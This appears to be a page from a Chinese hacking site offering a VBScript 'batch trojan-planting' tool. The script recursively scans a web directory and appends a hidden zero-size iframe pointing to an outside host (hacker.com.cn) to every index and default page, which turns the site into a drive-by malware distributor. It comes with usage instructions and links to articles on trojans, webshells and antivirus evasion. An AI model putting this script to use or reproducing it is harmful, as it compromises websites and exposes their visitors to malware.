|
[推荐]两个批量挂马脚本
scan.vbe
cscript scan.vbe web目录
程序代码:
| 以下是引用片段: '版权信息 br="************************************" & vbCrLf br=br & "* VBS 批量挂马脚本 *" & vbCrLf br=br & "* BY BanLG *" & vbCrLf br=br & "************************************" & vbCrLf & vbCrLf br=br & "cscript scan.vbe D:\" & vbCrLf '马的地址 ma="</Script><IfRAME height=0 width=0 sRc=" & chr(34) & "http://www.hacker.com.cn"&chr( ... t;</IFrAME>" '要挂马的页面如果嫌不够还可以自己再加,记得要用”|”隔开 MyString="index.php|index.asp|index.html|index.htm|default.php|default.asp|default.html|default.htm|index.aspx|default.aspx" '以"|"为分隔符拆分成数组 MyArray = Split(MyString, "|", -1, 1) web=WScript.Arguments(0) '如果web为空退出脚本 if web="" then Wscript.echo (br) window.Close end if Wscript.echo (br) & "马的地址:" & ma & vbCrLf & vbCrLf '创建对象 Set fso = createObject("Scripting.FileSystemObject") '开始扫描挂马 scan(web) 'scan定义函数,扫描查找符合条件的文件把马的内容写到文件的结尾 sub scan(filesder) set filesder=fso.getfolder(filesder) '得到当前目录的所有文件集合 set files=filesder.files '获取文件名 for each fext in files Set file1 = fso.GetFile(fext) filesext=file1.Name '把文件名转换成小写字母 ext=lcase(filesext) For Each index in MyArray '判断文件是不是我们在MyString里限定的文件,如果是就写马 if ext=lcase(index) then Set ts = fso.OpenTextFile(fext,8) '打开文件并在文件末尾进行写操作 ts.WriteLine(ma) ts.Close echo="" echo=fext & " .............ok" Wscript.echo (echo) end if next next set subfolders=filesder.subfolders for each subfolder in subfolders '搜索其他目录,递归调用 scan(subfolder) next end sub |
| 后门程序知识完全解析 | 01-14 |
| 2007年度网马漏洞不完全总结 | 01-09 |
| 简单修改木马壳头让卡巴斯基哑口 | 09-22 |
| ASPX一句话木马--终极版&详细分析 | 08-11 |
| 认识使用 Rootkit技术的木马 | 06-12 |
| 分析ANI智能网马挂马 | 06-08 |
| Flash木马是这样练成的 | 05-18 |
| XML木马研究 | 05-18 |
| 脚本图片类后门病毒的完美使用方 | 05-16 |
| 两个批量挂马脚本 | 05-11 |
| 黑客技术之打造不死的ASP木马的方 | 04-20 |
| php后门插在图片里执行回显思路 | 04-06 |
您现在的位置: